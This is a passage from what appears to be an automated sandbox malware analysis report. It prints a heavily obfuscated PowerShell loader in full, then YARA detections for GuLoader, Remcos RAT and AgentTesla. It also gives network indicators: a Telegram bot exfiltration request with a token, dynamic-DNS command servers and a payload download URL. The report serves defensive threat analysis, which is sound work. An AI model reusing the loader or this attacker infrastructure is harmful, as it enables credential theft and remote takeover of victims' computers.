St`$DovPlaTirGg_HapFeaPorshaGomRieNutPreHarJusSu,Ge[UnPCoaFerMaaMamHreVatBieNorOr(SkPVaogrsWaiWotBaisloFrnVa pr=Mi Fl1Yd)Ke]Ko Cl[ReTelyHapUdeRe]Hy Pl`$BlvSkrIktWh An=Be Su[BaVTaoRaiCadTh]ar)Gk;Au`$SoASadElsGycFirVaiSopSptJeiPhtAeiMeuSasVu2Ru Th=Ca LiHSlTTrBKl Su'SaEOmDCh9ZoFSu9PeDEk8PiBAfEFl9BaFAp4MeEel9Sp9Ra2Sk8Re8CoBMa9daBPr9co8PyDBaATh6FrAGe4EcAEt8PiAFa0exASk7Gs9fo4BuFRe3PrFHr3Te8AnAAdBBaCNyBheBOpBDiBCaAUnCAlASt7HeBInDTh8KeDSnAId6RfADe4RuASe8OxATr0JuAFr7KaECo7Mi8KoDTvABaCQuAInFDeATi0SkAPe7GaADeCVa8StDJaBCo0ApAKi7FjATa8AlATe4CaAMi0ReAOiAAr8Ln8AnBSaAtrBSaAsoAFrCGeAHa4NeALaBTrAPl5DiBat0MaENi1ImEMa1Un8Li7trAesCFoBRoEReELa4Ve8Ac6UnAHoBEqAAa3coAaaCExAToAStBImDInEJe9in9FaAEvBSk0afBHyACuBTrDPrAinCTeABe4CeEAm7Ta9raBPeAWhCscAnaFBrASp5beAAcCBiAUnARkBInDFoAMu0KlAFh6HyAAm7BiELa7Pr8ba8FaBFoABrBStABeACiCLaALi4SeAEnBAtACr5laBSl0He8Sp7ChAMo8UnAAj4FiABiComEOv1KoEsuDFi9ViBLyADeCHyACoABnAAf8KaAFr5DoADoAEtAEr0PrBAsDStBWhBFiAHj8PrBReDCeAWiCKaFMo1frEUn0PiEOi0duEBr5PjEMo9La9An2Fa9KoAGeBIn0CrBSmALiBAxDLoAUlCBuAFa4MbEPa7Fa9KaBTrALiCEfAPaFInAsl5FrAjoCKoAPaAMaBUnDKoAEt0InANa6SeASe7NoEDi7Sh8UpCalAUb4DiAEt0foBChDKoEFo7Da8Re8HaBHoAMaBNaABeASpCspABo4InAOfBhjARh5AnBLo0Ba8FoBfiBStCCaAal0SiAPr5CoAHaDshAAcCSkBFlBSt8Pu8UrAsiAPrAYoAHuATlCKrBInAKaBStASy9Al4TiFOn3kiFMa3Fo9viBPaBMoCHoAbr7WoECe0FyEGn7ca8KoDKoAGeCAfAMaFStAco0BeACo7SkAfoCAn8StDAkBGe0meASt7DaAIn8WoAJo4VeAKo0EnANoACh8Ve4ScACr6KaAStDDrBArCFeAKu5SeAFrCFlEPa1MeECuDbi9HeBcyAReCCoAOsADiACo8LaABa5beAShABeASc0AmBBrDteBExBfaAes8frBUnDUdACrCFlFBr0TrEbe5afELy9PhEgiDDiABuFScAkm8BeAko5MaBLyAOvAGaCStESv0DaEAa7no8liDStAMaCYiAReFunAAn0UnAKv7EkAEnCOr9OcDInBUn0DaBIn9HvAmuCVeEUn1afEAmDMe8SpDStASoCMaAFr4CrAFa8ViAScENoABo7VaABrCPrBBaDFoAOb0unBAn3ReAPi8CaAreBUfAFi5BlATaCInFSn9PeEAn5fuEPu9DrECoDBu8teDIlACaCIlANa4ReASk8PrAFrERhARe7BrAHjCNeBUmDBiASa0HyBKo3WeAHe8UnAFiBAfABu5PnASaCPrFGe8StEFi5LuESu9An9Ti2Vi9BeAToBPu0FlBDeABrBFoDJaASkCQuAsk4SuEFr7Pa8Ry4SuBMiCVaAAc5BiBMaDSuAHo0SkATiAMaAAr8EmBHeAPiBLiDfo8AnDTuABrCAtAPl5FrAPrCExAWaELiATr8BlBSnDSiAImCMi9Un4EtEHa0Bl'Tr;Po&Co(Ov`$PrDBleRdmGlaSmgDenPteChtaniFrzstaKebCalHaeEn7Wa)Bd Mi`$AnASkdfosElcMirPoiLapUntsuiZotCaiReuUnsMe2Di;St`$GaANedsmsAbcExrAeiMopSatTeiPutBoiViuNosRe3we Ta=Re TiHTaTStBEr Ac'CaEGrDjo9GiFSw9SkDAn8CuBNaEYa7Ex8InDCaAMoCOfAhyFMuABe0BrAEl7PrAMeCCh8prAInAAn6ReADh7RdBMiATaBCuDCaBNoBSuBFrCRaAScAGuBMiDmiABe6FrBCoBUnERa1BeEHuDTu9SkBChASeCpaAFoAHaAIn8MaAAu5koAsoALiAtr0ThBOpDStBSkBLaAEs8gaBAbDGaAfeCInFTsFBaEKr5NaEsp9Su9Af2Fo9PoATaBSt0SkBvlAKaBSkDRhAAaCReANo4MiECr7Pr9BrBPrAprCAnAQuFFrAFy5CyAKoCOmAOrADeBSmDAfAXy0DaAIn6InASe7HoEgu7Kr8SaADeAOv8HeAAf5crAMi5skAPj0meAKa7MaALiEKo8KlASdABi6BaAFi7DaBIdFClAPaCBoAEn7BiBbaDUtAFo0CoASe6FuABa7ArBNaARe9Ma4FuFLa3PuFSc3El9SiACeBUbDMoANo8UnADe7NoAKaDufAFi8LiBFeBHjASnDPrEGu5GuERu9EnEBrDCaBSyFsaAGa8SwBBaBMa9Us6TrBCo9LuARo8DeBNrBKaAOn8TrABa4CpACoCOuBAnDSiAUdCNoBQiBEvBTeAGeEOp0AnESt7lo9SeABeACrCFlBNrDTv8Ka0KuAox4WoBPl9SoAPi5EdAplCmyAPa4DuASiCToABl7InBBiDuhALe8SnBInDLiAEf0ToASy6reANu7Af8FiFPoAPr5StAEc8GsASlEceBcoAKoEWa1AgEFoDFe9KuBSdAPyCMeAStATkATr8LuAEx5SkAScAMaAUn0ErBFlDSlBIsBScATn8KnBNeDFeAKaCTaFByEDiELa0Ro'Fo;An&Sp(Sp`$SoDBieBomcoaAggFunpseUntBuiWrzFaamabAfludeer7Ov)Gl Di`$EvAAndSisUtcAnrSoiRapKotAciSttSpiApuNosRa3Sc;Te`$LaAApdChsUzcPhrSaiPrpButKaiGrtsaiIcuDrsLo4Bo Af=St SaHHiTChBDi Kr'OuEteDKo9PeFHy9NoDCa8RaBDeEPi7En8SnDAsAUdCnoAIrFReAIn0KuASa7InACrCBi8Ho4FaASaCTrBPaDFlACy1FoADr6noAMeDYeEBe1TeEsuDDr8PeDPaAJoCBiAPa4crAFo8LnAJrEShAFo7alAGaCBlBFoDSuARe0WhBSt3BaAGu8JuAPaBMoARa5UiAReCHeFWiBBeEMe5QuELo9HoEFoDGe8BrDVrAPhCplAIn4RiABo8taATaEObASt7KaASkCSuBMiDchAHe0MuBTa3KoASu8SuADaBSpAEm5PrAFnCReFPlAVoEPa5JaEAn9trEPaDnoBSiFGeBInBAtBunDSoEHa5ReEHa9KvEKoDVoBNyFPiAEc8AlBReBFo9Po6LaBOv9GgAde8InBkoBToANo8PaASk4OlAMaCMeBReDEtANeCPrBMaBTrBPrAInEPo0unENo7Ca9AbAHyAEfCOrBSeDve8Pl0ReApr4TrBRe9LiATr5SpAKoCUnAFo4CoAUnCSvALa7foBGnDBlACo8ToBThDEmADa0saARo6OvABo7An8PsFPrADi5SpABo8FlALiEAcBBeAafEMa1UlELaDTo9UtBHiADaCInAPhAPlASa8UdARa5teATiABrASk0UnBMaDStBMuBunAAf8MoBAsDSwABoCAfFSpELeEBi0Tu'En;En&Re(Fa`$SuDvieSpmSuaLygRenBleEntJoiCazInaPobpulAseTi7Ly)Re ga`$kaAModUdsBecstrTriFopHatBiiswtFliTiuEnsHa4Ga;Co`$SkAChdPisIncCorBiinepBatHaiVatteiinuErsTe5Fo Gi=uk FlHBeTHyBBo Fl'DyBFrBJaAStCLeBLaDReBSpCInBInBBoALo7RoEPt9TmEbaDBe9HiFAm9PeDTh8LaBViEOv7Pa8UdATrBOpBjiAtrCAfAKo8LeBReDDrAUnCCo9CoDChBTy0KiBMa9GaASiCFlESo1SkEOp0Go'ki;fl&Ca(Ba`$deDSaeStmWoaLugNunBreOrtDiiTrzLiaGebSilMyeKo7Pr)Ga Sp`$JiALidHasRocUnrBriUppGetFeiTitDiiAdustsSk5Co Ki Pn Tr;Sk}Bo`$enkSukUl Sc=Sk SpHSlTSaBLo Be'EnABa2MaALaCMiBPoBMoASu7SpAStCMoACo5BiFAlAFjFAbBKe'Fo;Pa`$ViASidPrssucHarBeiFopOptUniEktSmiOkuSpsub6sp Ti=li PrHCaTWhBHo St'unEAlDToBPrFEnAOp8ViBviBAn9So6RaBFlFElAMe8BaEAr9EfFSm4BaEMi9Bi9Am2Ub9slAUdBMa0MeBKiAInBLiDMeARoCSuAUn4pjESt7Dr9fiBUdBSqCReAPr7GrBInDCaATr0NaAby4FrAudCHyEDo7Mi8Fo0beAHo7ReBBoDCoAFjCInBDoBReAEl6BoBPe9Vi9SuAFoANoCXyBFnBBlBMeFveAfe0OuALeASlAdeCKaBTjAChEDa7Ha8No4KoAOp8HoBAlBGaBAlAfoASe1SkAPr8MiAZy5Ap9Dr4RuFKl3HjFRo3Cz8WiEkuAMeCSkBTwDRi8SpDDeAAgCPsAGa5ClABeCRiADeEIsAKa8LaBLiDSlAKnCPr8PoFPjANa6PrBStBCi8SmFBaBNaCSaAfr7InAAdASpBTvDApAKl0DoAIn6GeAHe7Na9Sp9NoAJo6FoABo0TrARa7KlBOlDTrASpCXiBFaBKiEin1SoEKn1brACaFDeAPh2UnBDa9CaEDe9ChESeDTaASt2SuAVa2AlEMa9TeEBeDCa8WaDOpATiCElASt4UnAaf8GsAApEMiAsk7EgAFiCSpBQuDFoAPr0SpBDe3HeATi8UsAOfBPaASa5ShAreCGlFSuDKoEOm0stERe5heEGl9chECa1Hy8NoEFo8AnDSl9SeDFeEEx9Sk8Ma9suESu1Pi9St2Sc8Fl0ReATo7FlBLbDRe9st9MiBArDdeBKrBBi9As4OrESt5AfESp9Ga9Ty2Kl9PrCPe8Ro0InANo7FrBAaDUvFArAMiFMoBSp9Ro4CoEPe5UdESe9Tr9Me2Sk9SlCru8Ek0BeAFi7FlBflDVeFHoASiFEmBOv9Ax4urEDu5PaEmu9Un9Om2Pr9LiCSk8Ar0SmALu7UnBCoDimFSpANoFCyBBr9Fl4MeEUn0MoEPa9LaEBe1Va9Pr2De8Re0CuASk7PrBEuDas9Sk9SgBGrDSkBWiBFo9Do4HaEIn0PuEAd0BaELa0Pr'Re;Su&At(Te`$AfDFueUdmSaaStgFrnBaeArtLaiStzSnaAgbFllHoeSv7To)In Sy`$UnAFadSlsLocudrUniPrpObtTiiGetUniCruZosRu6Pr;Fo`$ChvFoaefrKl_SmnRutUn Be=Ud VaftokAppSk Sk`$BrDPreGemDiaIngStnUneHotBaiHezKeaEmbaflbeeth5re Be`$OcDLaeFimRaaRugLanTeeKntPoiBezHraGabPolSjeSl6sa;Fo`$IdAMidVesTocInrMoiLapSwtPliEktOpiReuPasFr7Ba He=No PrHUpTPrBOr Ob'BeEMaDFu8Pe8seBNiBPrBFeDCyAKnCSeASyFCrADe8GeANe2syBPeDKiAFlCefBSeBFaFGuABiEAr9spFHu4DeESt9FiESsDFlBReFHaAre8ouBHuBPa9Di6BlBSeFUnAre8BiEHo7Fa8Ri0MeATi7miBDeFKoAKu6JaAst2teAInCTiEAn1An9Op2Ak8Hi0KlARe7AfBDeDLa9My9DoBStDReBPrBPr9Dy4reFTr3KaFEd3ri9Co3RiAViCKaBAsBHaAEk6OrEMi5UnEUd9tiFUkAMoFBlFTeFTrFToEKo5UnESa9RaFCe9NoBBo1RiFEsAGiFBr9BlFFo9TnFHa9MaEMa5PaEJa9GrFPe9FrBUn1trFLaDOvFKe9SkESv0Ov'Ap;In&Om(pa`$PeDSleWemcaacigPunLoeFatNeiDezHeaPabFrlWiebl7Ve)Ac Py`$MaARedPospicSkrM iTipTytObiamtoniSkuTesan7Pr;Su`$BiACodPrsBocKirusiIcpDetSliPetLyiteuPesEf8Un Po=Tr FrHphTNaBDy Ti'ErEGrDcoAAc6fjBKaBEnABe0UnERa9ChFSp4SmEFl9SuETeDCoBafFIcADu8BlBRaBFr9Sv6KlBFiFJuASi8FoEPa7Cl8Pe0MiAKo7raBVaFdiAMa6NaASp2ArASpCgaEbr1Ap9Re2At8Ku0CaASp7BlBKuDLa9Im9MaBBoDPhBGwBRe9em4caFSt3PoFov3br9st3VoAUnCJeBmaBEsAAc6CoECl5UnEOo9MiFBa9KeBDe1BuFHj8SmFSk9DeFUn9foFCa9HuFAl9KoFEn9EgESo5BaEDe9UnFTa9JaBCl1AkFPrATeFFi9TeFPi9NoFBu9opENs5BoELe9EuFBa9TaBEn1KrFToDTrELi0Ti'Sk;Pe&Ln(in`$PrDQueKemKraDrgOpnReeUntWhiblzKraUrbKllDaeAr7Os)Re La`$luAgldNosAncHorUniSopNitEpiCotFsiaruUlsHy8Ha;Bu`$FosBspCaiOvlafdTeenuvDdaAnnOpdJosDrpPerFloKojDheTekAptFleSerMy=By(chGFoeTatda-DoIOrtBeeBomUdPGrrsaoSppDiestrBetPhyCe An-DePSpaJatSlhSt Un'GaHAaKEfCStUPa:Ud\FlKOpyHaseahTaaViaManbodleearnSt\MidCouRemMepNoeCotDesSu'Vi)Br.SklBeaLoyPnldraJasca;Va`$KoAGedAdsStcInrIniSepGrtheiTitFuifeuRasSp9Sa De=Ch UnHLyTInBFl Ve'NaEGrDPr8Gr8ReACyDGaBCaAAcAUnAFoBStBPrAkl0AlBBa9CaBImDPaARe0NuBKoDPaAOt0UnBToCPrBAbASeEEn9riFCl4EmEbl9Fo9Ne2De9TrASkBSt0TaBbiAChBCoDSpAMeCIdAAn4PhEBe7Dd8TeAPaALo6SpAGr7ReBHiFCaALeCSeBDeBSkBGoDBe9Li4EmFHy3rgFUn3Ar8VeFNoBFiBenAin6DiAAa4Br8UnBFiApi8YvBAfABaAHeCSuFGrFFaFBaDin9VaAUnBCoDToBOvBInALa0LrAAc7mbATrEStECo1SaEMaDBlBUdAFaBBe9CoASk0NeABa5anANaDCaALeCJeBIdFAkATi8YdATa7DeAbaDUnBFoAEpBMi9ChBTrBSvACa6SvAPh3AgASyCJoAre2RuBvaDMiAUnCKeBInBJoESt0co'Co;Sa&Re(Fo`$ImDbeeUdmSaaOugUdnMyeDetSaiDizLiaMebGelKoeOv7In)Le Su`$CaABedcrsFrcBaririSypDitLaiKetAdiAnuEpsSi9Am;De`$TesAgpreiOplisdCheKlvLeaDenLadkosprpInrFdouljSkebukMatsheRurNo0St Sp=Ge JoHToTDeBMo Re'Pr9Co2Ko9CiArhBLi0chBSnATiBevDNeAPoCBaAAn4heESl7Ri9TyBUnBCeCEnAMo7PoBPaDFeATr0StABe4stAStCExEbu7is8Ch0GeAWa7SkBAlDReAInCInBMaBcoADe6MoBSi9Ad9HjANeAUdCReBFiBAlBUnFKkADe0ReAVaATiAOvCSuBEuAAsESp7Hy8Af4MeARe8InBTvBLnBSuAPrANo1PaASi8UdATo5De9Al4UlFDr3UnFFo3Bu8ReARaAJo6FrBNi9kaBpo0HaETh1FrETwDSs8se8PaAAlDPaBWaAVoAPsAFnBDeBteASl0VeBFo9SuBBrDHyATo0koBEgDdeAHe0olBGlCPaBboAHaEEr5PoEVn9SeFLu9TeEuf5GlEDe9RuEbn9PaESlDMt8Di8JuBAmBteBimDItAVeCArABiFUsAHy8UdARd2MeBLlDtrATiCanBSaBBiFKuAHaEGo5PaEOu9StFSkAHyFLiFVaFCoFBlEEn0Xe'Er;Ma&Af(Ly`$scDCoeFrmGaaThgChnTreTjtPyiDizImaEpbTilSaeTa7Um)Ra Ta`$PosLapUniAnlEcdtreTrvdeaPonSadSasnypCorBooRejFoeSakVotdieSvrSn0Li;ph`$FasTyiSpzvaePa=Ha`$GeAOvdbrsEqcAprstiPapQutHuiLitSyiUnuWrsPa.AncInoBeutenUntAv-Ou3Di6Si6Ty;Af`$BesMepMyiSylSadJdePevMeaAsnSydSpsSlpPirGroEwjHyeSukEntNeeRhrSa1Kr Le=ne HyHHaTInBSa Un'No9Pe2St9FlAGeBIm0PuBStAbeBBeDTrACoCTrASe4ReESa7Sa9SpBmoBGlCEfASa7TfBDuDKoAAf0miASc4TiAofCMoEOr7Pa8Ig0NoALe7FiBTuDDeAJaCBoBChBMaAFi6GrBPr9Ch9SwAJeAImCHaBSaBOrBGrFFoAPr0KnASiAPrAHaCudBGeAVeEEl7Ed8Cl4biAFr8NeBOdBRaBDeAGlACr1TrAGa8PsAPa5Gi9Ze4NoFBl3auFFo3Mo8KiAorAAf6NeBKr9TaBDy0TiEUd1DiENiDbr8Ga8KaAPaDBhBEnASkATyABgBVeBuoAAb0AbBDo9FoBSyDDiARe0BaBBoDWaAst0VuBSuCTaBTyAImEFo5skEFl9FeFPlAWiFInFklFKrFViENe5VaEsv9HoESuDEvASp6tiBMiBKaAKl0BaEBa5kvERi9SmESvDStBHaAChABa0CoBFl3SyACoCRmEPs0Ir'vi;No&Re(Di`$PaDUdeRamPraAvgpenAneAmtSyiSezSoaSvbSalfieDe7Ov)Sm Ko`$MusBrpDyijulDedMieovvJoaCanPhdAtsOrpFrrPaoFojNoePrkBotSoeKarHe1Bv;Ca`$AgsRopGriJulPodBreAfvRoaUdnSydChsStpFerAnoCijWeeStkAntWieRerTo2Un Ro=Sa MoHVeTFoBan la'inESaDPlBPjFMoARa8MiBUgBno9Fl6guBTjBOpBAmCAnACy7PeASy4PuAShCOpETi9CeFCo4ExEDe9Fa9Un2un9ToAPaBTe0LiBEmASaBcrDPrACuCSoAFo4HoEPo7Re9PeBzyBBoCJeAka7HoBPrDJuAAn0CuAdi4PaAgeCraEwo7Di8Fa0ReASe7StBAnDOvAGlCAfBInBObAor6UnBLy9No9KaASaAOpCDiBInBAbBTrFToATy0BeAspAFlAArCskBInAWiEBr7Ba8Yd4YaABu8UdBSkBVaBfoATeAHo1AbAFo8FaAMa5Jo9Wh4WeFMi3heFFo3Re8CrESkAInCRaBHoDGr8TaDAnAViCkrAPr5ReAEfCFiATaEAlAAp8beBprDChAHaCPe8klFUdALi6GeBStBFo8gaFSuBShCafALr7AtATrASlBBaDHaAAn0SoAbr6TyAFl7Uk9Fr9FoABr6BuAPr0PoAHe7doBDoDanAMoCCrBAfBPaECh1PaEapDPr8gr8HjBDvBAaBLoDSuASkCSfAFlFHiASv8DiADd2inBSuDMaASeCCeBhuBYdFFiAunEBr5StEVe9CiENe1Ud8PhESa8InDOr9NaDBaELi9Ko8An9UnEIn1Ka9Ce2Re8Pl0ErACr7OmBSmDhy9No9HeBIdDCoBBeBUn9Ca4veELe5Or9Ps2Be8St0CaAMa7TjBUpDBl9Ud9KaBMyDLuBArBRe9do4SyEBi0SeEGr9FrEAn1Pr9Op2Un9CiFPoAEx6MoALa0VaAVeDSp9Ch4ChEWh0ArEVa0BeEAn0En'Di;In&Ma(Li`$GeDCheEumOuaHvgLonNueUatFuiMizfjaKrbEtlOeeIn7Fo)In Ma`$FosDepGoiLalUndMieAmvWhaImnTydGesFipAnrDaoMojJaeUskOmtFaeHorso2Fi;Ou`$AnsNypOviSplTadKoeBlvReaInnSadSisOppAlrbrochjHoeStkSttmoeBerre3Pr Cu=Sa PhHFuTsiBpa Vo'ovEBiDHyBPuFwiASt8PeBkuBIn9Bo6VeBStBUnBKvCDiAUn7NaAGa4KoAFiCveEFa7Tr8Sm0UdAFl7HaBDeFHeATa6HyARa2EnASkCSaEEx1AdERoDMaADd6InBOpBSaANo0InEBr5TaEAdDInBHaFHaADi8AfBBaBce9No6RuASa7BuBUnDMoESu0Mu'Tr;Sw&Go(Se`$ReDHaeBemRoaPrgHenRoeSythuiLezPlaPabPjlHaeAa7No)Un ne`$ResStpHeiFulRedOteBrvHuaGonDedFesStpKvrIboDijSteFikFntReePlrSm3Ni#Bl;""";;Function spildevandsprojekter9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Brndoffers = $Brndoffers + $HS.Substring($i, 1); } $Brndoffers;}$Chlorpikrin0 = spildevandsprojekter9 'AgIPaEBeXBa ';$Chlorpikrin2 = spildevandsprojekter9 'CosLatHuaCerRytRe-RejAfoYvbRi ';$Chlorpikrin1= spildevandsprojekter9 $Damspils;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Chlorpikrin1 ;}else{&$Chlorpikrin0 $Chlorpikrin1;};;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
              • CasPol.exe (PID: 3788 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 3248 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000000.3773940652.0000000000E00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.11.20149.154.167.220498814432851779 11/28/22-20:47:47.307107
            SID:2851779
            Source Port:49881
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Multi AV Scanner detection for domain / URL
            Source: sinopbisikletkiralama.comVirustotal: Detection: 8%Perma Link
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49881 version: TLS 1.2

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49881 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Uses dynamic DNS services
            Source: unknownDNS query: name: backupfrontmanny.duckdns.org
            Source: unknownDNS query: name: myfrontmannyfive.ddns.net
            Source: Joe Sandbox ViewASN Name: WKD-ASIE WKD-ASIE
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: POST /bot2135733177:AAGBiQMSb9sct4MUL0kpdpB0pPO3n3AKBfA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad181ce08d6acHost: api.telegram.orgContent-Length: 1015Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 37.0.14.209 37.0.14.209
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: global trafficHTTP traffic detected: GET /Bichloride.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sinopbisikletkiralama.comCache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.11.20:49814 -> 84.38.134.104:4939
            Source: global trafficTCP traffic: 192.168.11.20:49815 -> 37.0.14.209:4939
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownHTTP traffic detected: POST /bot2135733177:AAGBiQMSb9sct4MUL0kpdpB0pPO3n3AKBfA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad181ce08d6acHost: api.telegram.orgContent-Length: 1015Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: sinopbisikletkiralama.com
            Source: global trafficHTTP traffic detected: GET /Bichloride.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sinopbisikletkiralama.comCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49881 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Installs a global keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASS

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo 